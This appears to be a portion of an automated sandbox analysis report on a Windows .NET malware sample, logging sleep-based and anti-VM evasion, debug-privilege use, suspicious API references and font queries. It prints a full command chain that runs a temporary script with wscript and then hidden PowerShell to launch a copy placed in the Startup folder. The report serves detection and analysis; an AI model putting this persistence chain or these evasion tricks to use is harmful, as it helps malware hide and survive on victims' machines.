Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99312s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98875s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98765s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98515s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98406s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98281s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98015s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97906s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97797s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97687s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97578s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97469s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97359s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97015s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96906s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96797s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96531s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96422s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96312s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96203s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96094s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95953s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95703s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95594s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95484s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95375s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10789125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10789016s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788641s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788391s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 5676	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 6884	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 5464	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Source: powershell.exe, 0000000A.00000002.823826919.0000000005038000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 0000000A.00000002.823826919.0000000005038000.00000004.00000001.sdmp	Binary or memory string: e:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: a.exe, 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp	Binary or memory string: EnableAntiVMware
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: a.exe, 00000011.00000002.839119724.0000000000C8A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN

Source: C:\ProgramData\a.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\ProgramData\a.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process token adjusted: Debug

Source: C:\ProgramData\a.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: 13.2.a.exe.400000.0.unpack, CC2/LCs.cs	Reference to suspicious API methods: ('WXK', 'VirtualProtect@kernel32'), ('LXr', 'GetProcAddress@kernel32'), ('lXy', 'LoadLibrary@kernel32')
Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs	Reference to suspicious API methods: ('EBg', 'GetProcAddress@kernel32'), ('UBW', 'LoadLibrary@kernel32')
Source: 13.2.a.exe.400000.0.unpack, DCX/jCC.cs	Reference to suspicious API methods: ('FCK', 'MapVirtualKey@user32.dll')

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\ProgramData\a.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'

Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Source: C:\ProgramData\a.exe	Queries volume information: C:\ProgramData\a.exe VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
